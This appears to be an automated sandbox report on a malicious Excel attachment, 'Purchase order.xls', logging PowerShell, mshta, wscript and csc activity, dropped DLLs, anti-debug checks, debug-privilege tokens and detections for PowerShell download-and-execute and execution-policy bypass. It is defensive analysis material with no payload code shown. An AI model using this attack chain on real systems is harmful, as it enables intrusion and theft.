Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process information set: NOGPFAULTERRORBOX

Source: Purchase order.xls	Stream path 'Workbook' entropy: 7.99853674567 (max. 8.0)
Source: 23530000.0.dr	Stream path 'Workbook' entropy: 7.9986620792 (max. 8.0)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2383	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4674	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1393	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6715	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3289
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2735
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1885
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 717
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1002
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1105
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8758

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.dll			Jump to dropped file

Source: C:\Windows\System32\mshta.exe TID: 3868	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4088	Thread sleep count: 1393 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4088	Thread sleep count: 6715 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3136	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 3216	Thread sleep time: -480000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 924	Thread sleep count: 837 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1504	Thread sleep count: 3289 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2108	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3388	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1424	Thread sleep count: 2735 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3012	Thread sleep count: 1885 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 728	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2992	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 804	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596	Thread sleep count: 717 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596	Thread sleep count: 1002 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796	Thread sleep count: 1105 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796	Thread sleep count: 8758 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2348	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2348	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 3992	Thread sleep time: -60000s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Code function: 26_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

26_2_00403D74

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Thread delayed: delay time: 60000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Code function: 26_2_0040317B mov eax, dword ptr fs:[00000030h]

26_2_0040317B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Code function: 26_2_00402B7C GetProcessHeap,RtlAllocateHeap,

26_2_00402B7C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 3804, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

